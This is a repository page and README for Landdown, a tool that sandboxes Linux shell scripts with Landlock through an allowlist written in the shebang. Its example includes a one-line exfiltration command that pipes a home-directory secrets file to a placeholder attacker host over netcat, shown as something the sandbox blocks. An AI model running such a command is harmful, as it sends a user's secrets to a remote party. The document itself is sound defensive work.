Landdown – Simple shell script sandbox

~marcc/landdown - Simple sandboxing for shell scripts - sourcehut git ~marcc / landdown summary tree log refs Simple sandboxing for shell scripts 42540c81 — Marc 2 hours ago Add good practices c8c28213 — Marc 2 hours ago README 655125d7 — Marc 2 hours ago * refs main browse log clone read-only https://git.sr.ht/~marcc/landdown read/write [email protected]:~marcc/landdown Clone repo to your account You can also use your local clone with git send-email . # Landdown - Simple shell script sandbox Landdown is an easy-to-use utility for Linux that allows you to sandbox shell scripts with Landlock . Just like Landlock, Landdown "aims to protect you against the security impacts of bugs or unexpected/malicious behavior". To use, prepend your script with the landdown shebang and a ruleset, and then write your shell script like you would normally. For example: #!/usr/bin/env landdown ro /bin ro /lib #!/bin/sh # Following works echo "Hi" # Following fails cat $HOME /my-secrets | nc exploit.com 1337 Landdown locks down file and network access of a script based on rules explicitly listed in the allowlist. The syntax is: #!/usr/bin/env landdown #!